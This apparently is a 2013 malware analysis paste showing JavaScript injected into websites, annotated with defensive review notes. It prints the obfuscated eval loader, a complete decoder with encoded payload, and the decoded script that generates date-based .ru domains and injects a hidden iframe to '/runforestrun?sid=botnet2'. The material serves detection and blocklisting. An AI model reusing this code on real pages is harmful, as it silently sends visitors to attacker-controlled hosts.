
Quttera web malware scanner detected malicious JavaScript

a guest Jul 29th, 2013 56 Never
/*
 * The Quttera web malware scanner detected malicious JavaScript code that injects hidden
 * iframes pointing to multiple domains in the *.ru area.
 */
/*
 * First obfuscation level.
 *
 * The injected snippet is one window.eval() call over String.fromCharCode(...). The numeric
 * list holds the character codes of the second-level script listed further down: it opens
 * with 116,114,121,123 ("try{") and closes with the codes for "if(f)e(s);}".
 * The " ... " inside the list is where this paste abridges it, so the line is not runnable
 * as shown.
 *
 * NOTE(review): a long fromCharCode list passed straight to eval is the stable trait a
 * scanner can key on. The two random-looking comment tokens bracket the injected statement;
 * presumably they differ between infections, which this single sample cannot confirm.
 */
/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,11 ... 8,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/
/*
 * Second obfuscation level (what the first level's character codes decode to).
 */
// `prototype` is read as a bare global name. Assuming the page defines no such global,
// the read raises a ReferenceError and the catch handler is the only path that sets x = 2.
// NOTE(review): routing the setup through an exception presumably targets analysis tools
// that do not reproduce browser error behaviour. This is inferred, not shown by the sample.
try {
    prototype % 2;
} catch (asd) {
    x = 2;
}
// Decoder stage. The try body exists only to throw: neither arm of the ternary names a real
// DOM method ("cr", or a string that starts with 2), so document[...] is not callable and
// control always lands in the catch handler. The pieces merely look like "createElement".
try {
    q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
    q.appendChild(q + "");
} catch (fwbewe) {
    i = 0;
    try {
        // Same bare-global read as in the first try block; the catch below does the setup.
        prototype * 5;
    } catch (z) {
        // First half of the method name "fromCharCode"; completed inside the loop.
        fr = "fromChar";
        // Encoded payload: each entry is a character code multiplied by 5 (even index) or
        // 6 (odd index), e.g. 510 / 5 = 102 ('f') and 702 / 6 = 117 ('u').
        f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 222, 160, 696, 520, 630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 696, 505, 690, 580, 192, 305, 192, 580, 624, 525, 690, 230, 390, 160, 252, 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230, 492, 160, 252, 160, 624, 525, 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160, 372, 160, 288, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750, 160, 606, 540, 690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 580, 606, 575, 696, 160, 258, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 200, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 252, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 205, 354, 50, 750, 50, 60, 510, 702, 550, 594, 580, 630, 555, 660, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 500, 192, 305, 192, 550, 606, 595, 192, 340, 582, 580, 606, 200, 702, 550, 630, 600, 252, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 160, 366, 160, 600, 230, 618, 505, 696, 360, 666, 585, 684, 575, 240, 205, 192, 310, 192, 245, 300, 160, 378, 160, 294, 160, 348, 160, 288, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 
606, 500, 192, 305, 192, 250, 306, 260, 318, 270, 330, 280, 342, 240, 294, 160, 258, 160, 240, 500, 276, 515, 606, 580, 462, 555, 660, 580, 624, 200, 246, 160, 252, 160, 288, 600, 420, 350, 420, 350, 420, 350, 246, 160, 258, 160, 240, 500, 276, 515, 606, 580, 408, 485, 696, 505, 240, 205, 192, 210, 192, 240, 720, 350, 420, 350, 420, 205, 258, 160, 240, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 690, 160, 252, 160, 288, 600, 420, 350, 420, 205, 246, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 390, 160, 366, 160, 312, 280, 300, 275, 294, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 462, 160, 366, 160, 300, 245, 312, 275, 312, 280, 306, 270, 312, 275, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 405, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 282, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 410, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 222, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 160, 366, 160, 294, 230, 288, 160, 282, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 550, 606, 600, 696, 160, 366, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 354, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 580, 624, 525, 690, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 495, 684, 505, 582, 580, 606, 410, 582, 550, 600, 555, 654, 390, 702, 545, 588, 505, 684, 200, 684, 220, 192, 385, 630, 550, 264, 160, 462, 485, 720, 205, 738, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 240, 385, 582, 600, 270, 385, 630, 550, 246, 160, 252, 160, 684, 230, 660, 505, 720, 580, 240, 205, 192, 215, 192, 385, 630, 550, 246, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 
690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 648, 505, 660, 515, 696, 520, 264, 160, 732, 555, 660, 505, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 570, 582, 550, 600, 160, 366, 160, 660, 505, 714, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 606, 580, 696, 505, 684, 575, 192, 305, 192, 455, 234, 485, 234, 220, 234, 490, 234, 220, 234, 495, 234, 220, 234, 500, 234, 220, 234, 505, 234, 220, 234, 510, 234, 220, 234, 515, 234, 220, 234, 520, 234, 220, 234, 525, 234, 220, 234, 530, 234, 220, 234, 535, 234, 220, 234, 540, 234, 220, 234, 545, 234, 220, 234, 550, 234, 220, 234, 555, 234, 220, 234, 560, 234, 220, 234, 565, 234, 220, 234, 570, 234, 220, 234, 575, 234, 220, 234, 580, 234, 220, 234, 585, 234, 220, 234, 590, 234, 220, 234, 595, 234, 220, 234, 600, 234, 220, 234, 605, 234, 220, 234, 610, 234, 465, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 580, 684, 160, 366, 160, 234, 195, 354, 50, 192, 160, 192, 160, 612, 555, 684, 200, 708, 485, 684, 160, 630, 160, 366, 160, 288, 295, 192, 525, 192, 300, 192, 540, 606, 550, 618, 580, 624, 295, 192, 525, 192, 215, 258, 160, 246, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 575, 696, 570, 192, 215, 366, 160, 648, 505, 696, 580, 606, 570, 690, 455, 594, 570, 606, 485, 696, 505, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 570, 582, 550, 600, 220, 192, 240, 264, 160, 648, 505, 696, 580, 606, 570, 690, 230, 648, 505, 660, 515, 696, 520, 192, 225, 192, 245, 246, 465, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 575, 696, 570, 192, 215, 192, 195, 276, 195, 192, 215, 192, 610, 666, 550, 606, 295, 60, 625, 60, 50, 690, 505, 696, 420, 630, 545, 606, 555, 702, 580, 240, 510, 702, 550, 594, 580, 630, 555, 660, 200, 246, 615, 
60, 160, 192, 160, 192, 580, 684, 605, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 240, 580, 726, 560, 606, 555, 612, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 366, 160, 204, 585, 660, 500, 606, 510, 630, 550, 606, 500, 204, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 192, 580, 684, 585, 606, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 590, 582, 570, 192, 585, 660, 525, 720, 160, 366, 160, 462, 485, 696, 520, 276, 570, 666, 585, 660, 500, 240, 215, 660, 505, 714, 160, 408, 485, 696, 505, 240, 205, 282, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 708, 485, 684, 160, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 192, 305, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 294, 270, 264, 160, 234, 570, 702, 195, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 160, 366, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 495, 684, 505, 582, 580, 606, 345, 648, 505, 654, 505, 660, 580, 240, 170, 438, 350, 492, 325, 462, 345, 204, 205, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 505, 696, 325, 696, 580, 684, 525, 588, 585, 696, 505, 240, 170, 690, 570, 594, 170, 264, 160, 204, 520, 696, 580, 672, 290, 282, 235, 204, 215, 600, 555, 654, 485, 630, 550, 468, 485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585, 660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545, 276, 575, 696, 605, 648, 505, 276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288, 
560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 624, 505, 630, 515, 624, 580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525, 600, 500, 606, 550, 204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];
        // "eva" + "l" below: the name eval is assembled so the literal never appears.
        v = "eva";
    }
    // e becomes a reference to window.eval.
    if (v) e = window[v + "l"];
    w = f;
    // s starts as an empty array; the first `s + <string>` turns it into a string.
    s = [];
    r = String;
    // z is assigned here but not read again anywhere in this listing.
    z = ((e) ? "Code" : "");
    // 1776 - 5 + 5 is simply 1776: the loop walks array indexes 0..1775.
    for (; 1776 - 5 + 5 > i; i += 1) {
        j = i;
        // r[fr + "Code"] is String.fromCharCode. The divisor is 5 + e("j%2"), i.e. 5 on
        // even indexes and 6 on odd ones, which undoes the encoding of the array above.
        if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
    }
    // Hands the decoded text to eval; the decoded payload is the script listed below.
    if (f) e(s);
}
/*
 * The decoded payload generates hidden iframes that request "/runforestrun?sid=botnet2"
 * from pseudo-randomly generated domains in the *.ru area.
 */
/*
 * Advances the generator state stored on `this` and returns the next value.
 *
 * RandomNumberGenerator installs this function as its `next` method and supplies seed, A,
 * M, Q, R and oneOverM. The hi/lo split resembles Schrage's method for a multiplicative
 * congruential generator, but Q is M / A without truncation, so hi and lo are fractional.
 * NOTE(review): anyone recomputing the generated host names for blocking must keep this
 * arithmetic in doubles exactly as written; an integer port would yield different names.
 *
 * Returns this.seed * this.oneOverM, computed after the state update.
 */
function nextRandomNumber(){
    var hi = this.seed / this.Q;   // plain division, not an integer quotient
    var lo = this.seed % this.Q;   // remainder against a non-integer Q
    var test = this.A * lo - this.R * hi;
    // A non-positive result is shifted up by M before it is stored as the new seed.
    if(test > 0){
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}
/*
 * Constructor for the seeded generator that drives the host-name generation.
 *
 * unix: Unix time in seconds (multiplied by 1000 to build the Date).
 *
 * The seed depends only on the month, the day of month and an "hour > 12" flag, all read
 * through the local-time Date getters. Year, minutes and seconds never enter the seed, so
 * the state is the same for every call that falls in the same half-day window (00:00-12:59
 * or 13:00-23:59 on the visitor's clock). That determinism is what allows the name for a
 * given date to be computed in advance for blocklisting or sinkholing.
 * NOTE(review): because the getters use local time, visitors in different time zones can
 * be in different windows at the same instant.
 */
function RandomNumberGenerator(unix){
    var d = new Date(unix*1000);
    // s is 1 from 13:00 onwards (getHours() returns 13..23), otherwise 0.
    var s = d.getHours() > 12 ? 1 : 0;
    // s is already 0 or 1, so Math.round() does not change the last term.
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;      // not truncated; nextRandomNumber divides by this value
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}
/*
 * Scales the generator's next value onto Min..Max and rounds to the nearest integer.
 *
 * r:   object exposing next(), here a RandomNumberGenerator
 * Min: lower bound of the target range
 * Max: upper bound of the target range
 *
 * NOTE(review): presumably r.next() stays between 0 and 1; nothing here clamps the result,
 * so the caller relies on that to keep the value usable as an array index.
 */
function createRandomNumber(r, Min, Max){
    return Math.round((Max-Min) * r.next() + Min);
}
/*
 * Builds one host name: `length` lowercase letters picked by a freshly seeded generator,
 * followed by "." and `zone`.
 *
 * unix:   Unix time in seconds, passed on as the generator seed source
 * length: number of letters in the generated label
 * zone:   suffix appended after the dot
 *
 * A new generator is created on every call, so the result is fixed for a given seed
 * window. The only caller in this listing passes 16 and 'ru', which gives names made of
 * 16 letters a-z plus ".ru": a shape that DNS and proxy logs can be searched for.
 */
function generatePseudoRandomString(unix, length, zone){
    var rand = new RandomNumberGenerator(unix);
    var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
    var str = '';
    for(var i = 0; i < length; i ++ ){
        // One generator step per letter; the index range is 0..25.
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}
// Injection step, scheduled 500 ms after the decoded script is evaluated.
// Indicators visible here: an IFRAME with 0px width and height and hidden visibility, and a
// plain-http request for the path "/runforestrun?sid=botnet2" on the generated host.
setTimeout(function(){
    try{
        // Global flag: the iframe is added only if no earlier run has set it already.
        // Presumably this guards against pages that carry the injected snippet several times.
        if(typeof iframeWasCreated == "undefined"){
            iframeWasCreated = true;
            // Current time in whole seconds; only its month, day and half-day reach the seed.
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            // ifrm has no var, so it becomes a global on the infected page.
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
            // Zero size plus hidden visibility keeps the frame out of the rendered page.
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
        }
    // Empty handler: any failure is swallowed, so no script error surfaces on the page.
    }catch(e){}
}, 500);